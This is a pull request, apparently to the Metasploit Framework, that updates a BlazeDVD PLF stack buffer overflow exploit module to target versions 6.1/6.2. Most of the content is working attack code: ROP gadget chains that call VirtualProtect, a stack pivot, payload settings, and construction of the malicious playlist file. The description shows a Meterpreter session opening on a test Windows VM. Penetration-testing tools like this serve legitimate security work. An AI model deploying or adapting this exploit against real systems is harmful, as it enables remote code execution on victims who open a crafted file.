### PR TITLE
Added target 6.1 to module

### DIFF
--- a/modules/exploits/windows/fileformat/blazedvd_plf.rb
+++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb
@@ -14,17 +14,17 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'BlazeDVD 6.1 PLF Buffer Overflow',
       'Description'    => %q{
-          This module exploits a stack over flow in BlazeDVD 5.1 and 6.1. When
+          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
           the application is used to open a specially crafted plf file,
           a buffer is overwritten allowing for the execution of arbitrary code.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
          [
-           'MC',
-           'Deepak Rathore',
-           'Spencer McIntyre',
-           'Ken Smith'
+           'MC', # Developed target 5.1
+           'Deepak Rathore', # ExploitDB PoC
+           'Spencer McIntyre', # Developed taget 6.2
+           'Ken Smith' # Developed target 6.2
          ],
       'References'     =>
         [
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform' => 'win',
       'Targets'        =>
         [
-          [ 'BlazeDVD 6.1',
+          [ 'BlazeDVD 6.2',
             {
               'Payload' =>
                 {
@@ -78,31 +78,32 @@ class Metasploit3 < Msf::Exploit::Remote
   def rop_chain
     # rop chain generated with mona.py - www.corelan.be
     case target.name
-    when 'BlazeDVD 6.1'
+    when 'BlazeDVD 6.2'
       rop_gadgets = [ ]
       # 0x6162e802 RETN (ROP NOP) [EPG.dll]
       rop_gadgets.fill(0x6162e802, 0..7)
       rop_gadgets += [
-        0x6411437d, # POP EAX # RETN [NetReg.dll]
+        0x61636758, # POP EAX # RETN [EPG.dll]
         0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
-        0x6033d910, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
-        0x640402b3, # POP EBP # RETN [MediaPlayerCtrl.dll]
-        0x60335935, # & PUSH ESP # RETN 0C [Configuration.dll]
-        0x6032b8bb, # POP EAX # RETN [Configuration.dll]
-        0xfffffcff, # Value to negate, will become 0x00000301
+        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
+        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
+        0x61628ea2, # POP EBP # RETN [EPG.dll]
+        0x616069a1, # push esp # ret 0x04 [EPG.dll]
+        0x61626702, # POP EAX # RETN [EPG.dll]
+        0xfffffdff, # Value to negate, will become 0x00000201
         0x61627d9c, # NEG EAX # RETN [EPG.dll]
         0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
-        0x6403bb48, # POP EAX # RETN [MediaPlayerCtrl.dll]
+        0x61629938, # POP EAX # RETN [EPG.dll]
         0xffffffc0, # Value to negate, will become 0x00000040
-        0x6403a1b7, # NEG EAX # RETN [MediaPlayerCtrl.dll]
-        0x64046c72, # XCHG EAX,EDX # RETN [MediaPlayerCtrl.dll]
-        0x6403c973, # POP ECX # RETN [MediaPlayerCtrl.dll]
-        0x1001514c, # &Writable location [SkinScrollBar.Dll]
-        0x6403a94d, # POP EDI # RETN [MediaPlayerCtrl.dll]
-        0x6162e802, # RETN (ROP NOP) [EPG.dll]
-        0x64106f33, # POP EAX # RETN [NetReg.dll]
+        0x61627d9c, # NEG EAX # RETN [EPG.dll]
+        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
+        0x61612f5a, # POP ECX # RETN [EPG.dll]
+        0x100142ab, # &Writable location [SkinScrollBar.Dll]
+        0x616313ac, # POP EDI # RETN [EPG.dll]
+        0x6162e588, # RETN (ROP NOP) [EPG.dll]
+        0x6162d638, # POP EAX # RETN [EPG.dll]
         0x90909090, # nop
-        0x6031d582, # PUSHAD # RETN [Configuration.dll]
+        0x61620831, # PUSHAD # RETN [EPG.dll]
       ]
     end
     return rop_gadgets.flatten.pack("V*")
@@ -115,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
       plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
       plf[876,12] = make_nops(12)
       plf[888,payload.encoded.length] = payload.encoded
-    when 'BlazeDVD 6.1'
+    when 'BlazeDVD 6.2'
       plf = rand_text_alphanumeric(260)
       plf << rop_chain
       plf << payload.encoded

--- a/modules/exploits/windows/fileformat/blazedvd_plf.rb
+++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb
@@ -12,36 +12,58 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'BlazeDVD 5.1 PLF Buffer Overflow',
+      'Name'           => 'BlazeDVD 6.1 PLF Buffer Overflow',
       'Description'    => %q{
-          This module exploits a stack over flow in BlazeDVD 5.1. When
+          This module exploits a stack over flow in BlazeDVD 5.1 and 6.1. When
           the application is used to open a specially crafted plf file,
           a buffer is overwritten allowing for the execution of arbitrary code.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'MC' ],
+      'Author'         =>
+         [
+           'MC',
+           'Deepak Rathore',
+           'Spencer McIntyre',
+           'Ken Smith'
+         ],
       'References'     =>
         [
           [ 'CVE' , '2006-6199' ],
-          [ 'OSVDB', '30770'],
+          [ 'EDB', '32737' ],
+          [ 'OSVDB', '30770' ],
           [ 'BID', '35918' ],
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'process',
-          'DisablePayloadHandler' => 'true',
+          'EXITFUNC' => 'process'
         },
       'Payload'        =>
         {
           'Space'    => 750,
-          'BadChars' => "\x00",
-          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'BadChars' => "\x00\x0a\x1a",
+          'DisableNops'  =>  true
         },
       'Platform' => 'win',
       'Targets'        =>
         [
-          [ 'BlazeDVD 5.1', { 'Ret' => 0x100101e7 } ],
+          [ 'BlazeDVD 6.1',
+            {
+              'Payload' =>
+                {
+                  # Stackpivot => add esp,0xfffff254
+                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
+                }
+            }
+          ],
+          [ 'BlazeDVD 5.1',
+            {
+              'Ret' => 0x100101e7,
+              'Payload' =>
+                {
+                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper
+                }
+            }
+          ],
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Aug 03 2009',
@@ -49,22 +71,58 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.plf']),
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
       ], self.class)
   end
 
+  def rop_chain
+    # rop chain generated with mona.py - www.corelan.be
+    case target.name
+    when 'BlazeDVD 6.1'
+      rop_gadgets = [ ]
+      # 0x6162e802 RETN (ROP NOP) [EPG.dll]
+      rop_gadgets.fill(0x6162e802, 0..7)
+      rop_gadgets += [
+        0x6411437d, # POP EAX # RETN [NetReg.dll]
+        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
+        0x6033d910, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
+        0x640402b3, # POP EBP # RETN [MediaPlayerCtrl.dll]
+        0x60335935, # & PUSH ESP # RETN 0C [Configuration.dll]
+        0x6032b8bb, # POP EAX # RETN [Configuration.dll]
+        0xfffffcff, # Value to negate, will become 0x00000301
+        0x61627d9c, # NEG EAX # RETN [EPG.dll]
+        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
+        0x6403bb48, # POP EAX # RETN [MediaPlayerCtrl.dll]
+        0xffffffc0, # Value to negate, will become 0x00000040
+        0x6403a1b7, # NEG EAX # RETN [MediaPlayerCtrl.dll]
+        0x64046c72, # XCHG EAX,EDX # RETN [MediaPlayerCtrl.dll]
+        0x6403c973, # POP ECX # RETN [MediaPlayerCtrl.dll]
+        0x1001514c, # &Writable location [SkinScrollBar.Dll]
+        0x6403a94d, # POP EDI # RETN [MediaPlayerCtrl.dll]
+        0x6162e802, # RETN (ROP NOP) [EPG.dll]
+        0x64106f33, # POP EAX # RETN [NetReg.dll]
+        0x90909090, # nop
+        0x6031d582, # PUSHAD # RETN [Configuration.dll]
+      ]
+    end
+    return rop_gadgets.flatten.pack("V*")
+  end
+
   def exploit
-
-    plf = rand_text_alpha_upper(6024)
-
-    plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
-    plf[876,12] = make_nops(12)
-    plf[888,payload.encoded.length] = payload.encoded
+    case target.name
+    when 'BlazeDVD 5.1'
+      plf = rand_text_alpha_upper(6024)
+      plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
+      plf[876,12] = make_nops(12)
+      plf[888,payload.encoded.length] = payload.encoded
+    when 'BlazeDVD 6.1'
+      plf = rand_text_alphanumeric(260)
+      plf << rop_chain
+      plf << payload.encoded
+    end
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-
     file_create(plf)
-
   end
 
 end


### PR DESCRIPTION
We added a target for version 6.1. The updated module was tested using version 6.1.1.6 on Windows 7 SP1 and Windows 8.1 (WOW64). We updated the default target to 6.1.

```
msf4-git (S:0 J:1) exploit(blazedvd_plf) > rexploit
[*] Reloading module...

[*] Creating 'msf.plf' file ...
[+] msf.plf stored at /home/steiner/.msf4/local/msf.plf
msf4-git (S:0 J:1) exploit(blazedvd_plf) > 
[*] Sending stage (769536 bytes) to 192.168.90.187
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.187:49206) at 2014-04-10 12:09:52 -0400

msf4-git (S:1 J:0) exploit(blazedvd_plf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WINDOWS8VM\Spencer
meterpreter > 
```
